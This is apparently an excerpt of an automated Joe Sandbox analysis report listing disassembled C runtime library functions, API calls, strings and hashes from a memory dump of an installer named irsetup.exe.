                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual_lockfree
                                                                                                                    • String ID: COMSPEC$cmd.exe
                                                                                                                    • API String ID: 3602565165-2256226045
                                                                                                                    • Opcode ID: b887252e9a82ff158cc5d0f6a798b1d26206a4203a57b46acac22f2f10929cf5
                                                                                                                    • Instruction ID: 68278e6952bb5676aa1c7e33abe437adcf0fbace9db24f0e263f771a66120287
                                                                                                                    • Opcode Fuzzy Hash: b887252e9a82ff158cc5d0f6a798b1d26206a4203a57b46acac22f2f10929cf5
                                                                                                                    • Instruction Fuzzy Hash: 51318732304B8882EB93AF68A4857DE7391B78D3C4F558126F64D43A96DF34C60CC701
                                                                                                                    Function 00000001800218A4 Relevance: 15.2, APIs: 10, Instructions: 177COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2310398763-0
                                                                                                                    • Opcode ID: 8f3b6e9ff41334ba54332e6d1750106bbdce4b742fd25a8573c29cb5a3279734
                                                                                                                    • Instruction ID: ad6dcca9d861f50b33ce47824bcecdfeea55456dd60a8eb5268593a212cc83da
                                                                                                                    • Opcode Fuzzy Hash: 8f3b6e9ff41334ba54332e6d1750106bbdce4b742fd25a8573c29cb5a3279734
                                                                                                                    • Instruction Fuzzy Hash: FC717031614A888AF7A7EB25E8517EA73A0B7A87C9F54C115FA49476D6DF38C60CCB00
                                                                                                                    Function 000000018002B938 Relevance: 15.1, APIs: 10, Instructions: 106COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 921712934-0
                                                                                                                    • Opcode ID: d0536870306b69ef0be8a0b3515a67fa88222e8b226a91abf527962d6d50e32f
                                                                                                                    • Instruction ID: 40da67c960e1d4e2372dec5a0354c409265d61eb1e7225161d37e6ada3604ed7
                                                                                                                    • Opcode Fuzzy Hash: d0536870306b69ef0be8a0b3515a67fa88222e8b226a91abf527962d6d50e32f
                                                                                                                    • Instruction Fuzzy Hash: 9C414832610A8886E7A3AF75A8427EE3755B7897E0F55C61ABB64477D3CE38C608C701
                                                                                                                    Function 0000000180027EB0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 407timeCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FormatTime$__ascii_stricmpfreemalloc
                                                                                                                    • String ID: a/p$am/pm
                                                                                                                    • API String ID: 712559314-3206640213
                                                                                                                    • Opcode ID: 500c3b125aa916a9b4889e827686677fef4752b90ac516746913604bc946489c
                                                                                                                    • Instruction ID: cbe2ce431d5da5b9a7fad71b520a7281152b650febbd3d5ef3e97f1e640e6aa6
                                                                                                                    • Opcode Fuzzy Hash: 500c3b125aa916a9b4889e827686677fef4752b90ac516746913604bc946489c
                                                                                                                    • Instruction Fuzzy Hash: FBF1CD3A216698C6E7E7CF2484503ED67A1FB0DBC4F48D102FA8557A86DE398B5DE301
                                                                                                                    Function 000000018002F154 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 137fileCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F217
                                                                                                                    • GetStdHandle.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F323
                                                                                                                    • WriteFile.KERNEL32 ref: 000000018002F35D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$HandleModuleNameWrite
                                                                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                    • API String ID: 3784150691-4022980321
                                                                                                                    • Opcode ID: b197fd75b0bf504f15cb967d186853a3546cccada686d32beca6375f3c352b6e
                                                                                                                    • Instruction ID: 74dce0a69e53e3faa34f58e3e1ea06bdb026180a8ddaf6cfecd4a031f9f463fb
                                                                                                                    • Opcode Fuzzy Hash: b197fd75b0bf504f15cb967d186853a3546cccada686d32beca6375f3c352b6e
                                                                                                                    • Instruction Fuzzy Hash: 6651BD32200A4991FBB7D721A9957FA2395B78D7D8F44C52AB94982BD9CF38C30D8304
                                                                                                                    Function 0000000180030014 Relevance: 12.2, APIs: 8, Instructions: 192COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2310398763-0
                                                                                                                    • Opcode ID: 83723b4061026842c1002c17d67710934d330cb8e075b7ab162c63b928ae4f1c
                                                                                                                    • Instruction ID: 4870327f923fffb19be7d4a8fd62541ede676502e6ed6a30b25f36a9472d912a
                                                                                                                    • Opcode Fuzzy Hash: 83723b4061026842c1002c17d67710934d330cb8e075b7ab162c63b928ae4f1c
                                                                                                                    • Instruction Fuzzy Hash: B2710772A1629C42F7FB9AB59835BEF2781A38D7C4F66C505BA4542AC2CF7C87088700
                                                                                                                    Function 000000018003A584 Relevance: 12.1, APIs: 8, Instructions: 136COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A5DE
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A5F0
                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A63B
                                                                                                                    • malloc.LIBCMT ref: 000000018003A6A0
                                                                                                                      • Part of subcall function 000000018002D3E0: _FF_MSGBANNER.LIBCMT ref: 000000018002D410
                                                                                                                      • Part of subcall function 000000018002D3E0: HeapAlloc.KERNEL32(?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5), ref: 000000018002D435
                                                                                                                      • Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D459
                                                                                                                      • Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D464
                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A6CD
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A707
                                                                                                                    • free.LIBCMT ref: 000000018003A71B
                                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A731
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale$_errno$AllocByteCharErrorHeapLastMultiWidefreemalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1309137116-0
                                                                                                                    • Opcode ID: 436e94cebb002656211ac615f83855e072fffab04320f2842f8a450889c355c1
                                                                                                                    • Instruction ID: 9a90928fadca3bfaea65b2354fbc267cb61a2ea66039529c6e1bfa5df3b8ce18
                                                                                                                    • Opcode Fuzzy Hash: 436e94cebb002656211ac615f83855e072fffab04320f2842f8a450889c355c1
                                                                                                                    • Instruction Fuzzy Hash: E651A63620868886F7A39F15AD413DB73A1F74D7E8F5A8615FA1A43BD4CF74CA498700
                                                                                                                    Function 000000018001E0D0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3778485334-0
                                                                                                                    • Opcode ID: 7dfd68256b6577f8bef36267e68adb4a8b092e3ee4e321cd5696b2aafa3ca8e9
                                                                                                                    • Instruction ID: fc12ada8a128d6f1d404ec32f716f7f9352f897c7c547437a0ea03871e7a68a8
                                                                                                                    • Opcode Fuzzy Hash: 7dfd68256b6577f8bef36267e68adb4a8b092e3ee4e321cd5696b2aafa3ca8e9
                                                                                                                    • Instruction Fuzzy Hash: 5631D535104F88C6E7A29B54F8843EA73A0F78D798F518116FA8D427A5DF7DC28D8704
                                                                                                                    Function 000000018002BB84 Relevance: 12.1, APIs: 8, Instructions: 60COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3778485334-0
                                                                                                                    • Opcode ID: 72496d450d4107c48557a8d9e9b8d31312e128fbe6be5197dd2e51a830b1c4bf
                                                                                                                    • Instruction ID: c71b409959ccf73f4bc98b0901178c6aebfce8d2d3a295f4eecee81b12eb3b28
                                                                                                                    • Opcode Fuzzy Hash: 72496d450d4107c48557a8d9e9b8d31312e128fbe6be5197dd2e51a830b1c4bf
                                                                                                                    • Instruction Fuzzy Hash: 4E312F72608B8982DB668B55F4443DBB3A4F799784F504115EACD43B99DF78C24CCB00
                                                                                                                    Function 00000001800347B0 Relevance: 10.8, APIs: 7, Instructions: 301COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _lock.LIBCMT ref: 00000001800347DB
                                                                                                                    • free.LIBCMT ref: 00000001800348D2
                                                                                                                      • Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
                                                                                                                      • Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
                                                                                                                      • Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334
                                                                                                                    • ___lc_codepage_func.LIBCMT ref: 000000018003485B
                                                                                                                      • Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
                                                                                                                      • Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
                                                                                                                      • Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
                                                                                                                      • Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
                                                                                                                      • Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
                                                                                                                      • Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
                                                                                                                      • Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
                                                                                                                      • Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryErrorFreeFunctionHeapLastLookupPresentTerminateUnwindVirtual___lc_codepage_func_lockfree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3702655603-0
                                                                                                                    • Opcode ID: 2f966ea916f666462da1782ab5cc9371ebc527b73083383bbece24e9f1605637
                                                                                                                    • Instruction ID: 9471dd814442db4a536cca14816e46c77906279b8aeb0443e37adca9e85ad162
                                                                                                                    • Opcode Fuzzy Hash: 2f966ea916f666462da1782ab5cc9371ebc527b73083383bbece24e9f1605637
                                                                                                                    • Instruction Fuzzy Hash: 83D1D33320468885E7B39F24E4917EB7795F38D7C0F42C116BA895B7A6CF38DA598B04
                                                                                                                    Function 0000000180035694 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 190COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DecodePointer_errnofree
                                                                                                                    • String ID: cmd.exe
                                                                                                                    • API String ID: 3637258294-723907552
                                                                                                                    • Opcode ID: 8cd250cef9dc04e1030a94fead8d514a1372542504ad5278bd05599df5ed4360
                                                                                                                    • Instruction ID: 6943f989181965795582f8eaac26820451e32651ef6446f151c0a8e5233c8295
                                                                                                                    • Opcode Fuzzy Hash: 8cd250cef9dc04e1030a94fead8d514a1372542504ad5278bd05599df5ed4360
                                                                                                                    • Instruction Fuzzy Hash: 2C61273130468841FAE7E726A5117EF2391A78DBD0F55C936BE9947BE6CE38C7498700
                                                                                                                    Function 000000018002A29C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 171COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer_getptd
                                                                                                                    • String ID: -$e+000$gfff
                                                                                                                    • API String ID: 2834218312-2620144452
                                                                                                                    • Opcode ID: 70437f3bfbfdb2c2965d6d3f53b1fd9d8e3e8069317ac65cfa6244339cf6166a
                                                                                                                    • Instruction ID: a02038aa4d0300f9b50aee6095aae5c0a493ad474d81769f1ea6d53b9b79cc99
                                                                                                                    • Opcode Fuzzy Hash: 70437f3bfbfdb2c2965d6d3f53b1fd9d8e3e8069317ac65cfa6244339cf6166a
                                                                                                                    • Instruction Fuzzy Hash: C26108326086C846F7A7DB2998413DE7791F38A7D8F18C216FB5847B85CE39C64C8700
                                                                                                                    Function 0000000180039FD4 Relevance: 10.6, APIs: 7, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$ByteCharErrorLastMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3895584640-0
                                                                                                                    • Opcode ID: 7245fe9e3f893b78d75b3df2e8976107991caa5ac0895964952ffd918a5c7e21
                                                                                                                    • Instruction ID: 0496a83d19119119c06eac124665b0f9d544e026b86ecaffa96e669938c9ee47
                                                                                                                    • Opcode Fuzzy Hash: 7245fe9e3f893b78d75b3df2e8976107991caa5ac0895964952ffd918a5c7e21
                                                                                                                    • Instruction Fuzzy Hash: 185191326086C84AF7F79F65E8403EFB790F38A7D0F59C115B69943AC5CE68CA498B05
                                                                                                                    Function 000000018001ED40 Relevance: 10.6, APIs: 7, Instructions: 115COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2310398763-0
                                                                                                                    • Opcode ID: 9971678e4432facbc1ef1fc8bffed31b4a85e9e26782f1ce22b24466a6d4ab7e
                                                                                                                    • Instruction ID: 37d480c48d6613522327dc8b80719ac5bc1941a2faed874dfcc6a4ccd8653334
                                                                                                                    • Opcode Fuzzy Hash: 9971678e4432facbc1ef1fc8bffed31b4a85e9e26782f1ce22b24466a6d4ab7e
                                                                                                                    • Instruction Fuzzy Hash: 49418272710B8A83F7A69E35985279E3291B79D7C8F14C136BA054B686CF3CC618D700
                                                                                                                    Function 000000018002649C Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer_lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2175075375-0
                                                                                                                    • Opcode ID: db16a11e0748f8c7df55558d2753626681ae7582a959f48267dc8d83ede8206b
                                                                                                                    • Instruction ID: 3db3c45d6a0b5cd1f105f54f4b3baf641d9be13896c0f45c2bade60435e83e15
                                                                                                                    • Opcode Fuzzy Hash: db16a11e0748f8c7df55558d2753626681ae7582a959f48267dc8d83ede8206b
                                                                                                                    • Instruction Fuzzy Hash: 4931A432B10B9942FB97AE6595527DE6390AB8D7C0F44C525BF084BBCADF3CCA198700
                                                                                                                    Function 000000018002A600 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 298COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer_getptd
                                                                                                                    • String ID: 0$gfffffff
                                                                                                                    • API String ID: 2834218312-1804767287
                                                                                                                    • Opcode ID: aa0305aa27dcb933d0da9dfb5bb8f7d0176d6c65135dee39654fcde55db1ae09
                                                                                                                    • Instruction ID: b601890787595c58531ba7e6b687c0341182e1ca22c5763c78b8363e265dfe8c
                                                                                                                    • Opcode Fuzzy Hash: aa0305aa27dcb933d0da9dfb5bb8f7d0176d6c65135dee39654fcde55db1ae09
                                                                                                                    • Instruction Fuzzy Hash: 47B132726087CC47FBA38B2991453AE7BA5E75A7D0F14C222EB59077D2DE38CA59C300
                                                                                                                    Function 00000001800205D8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
